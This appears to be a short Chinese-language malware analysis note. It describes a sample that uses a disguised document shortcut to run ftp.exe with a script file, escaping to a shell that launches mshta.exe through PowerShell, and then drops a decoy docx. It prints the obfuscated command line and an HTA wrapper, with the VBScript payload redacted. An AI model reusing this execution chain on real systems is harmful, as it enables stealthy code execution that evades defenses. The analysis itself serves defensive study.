調用ftp.exe執行系統命令,不是太新奇的技術,可以不必大驚小怪。
在看雪論壇看到使用FTP執行惡意代碼的病毒樣本。ftp -s:filename指定包含FTP命令的文本文件,使用!號是轉義到shell。
偽裝快捷方式執行命令
樣本偽裝的文檔快捷方式調用ftp.exe進行執行命令。而調用的惡意代碼是隱寫到文檔里的,開頭用ftp執行了內置的!轉到shell執行了powershell.exe mshta.exe ccc.dat這條命令,用powershell.exe運行mshta.exe執行了ccc.dat里面的vbscript腳本。然后從ccc.dat中釋放出一個正常的drc.docx文檔到C:\ProgramData\drc.docx並且打開。
ftp -s:ccc.dat
ccc.dat
! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe m%windir:~-1,1%hta.exe '%cd%\ccc.dat'
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script type="text/vbscript">
XXXXX
</script>
</head>
<body>
</body>
</html>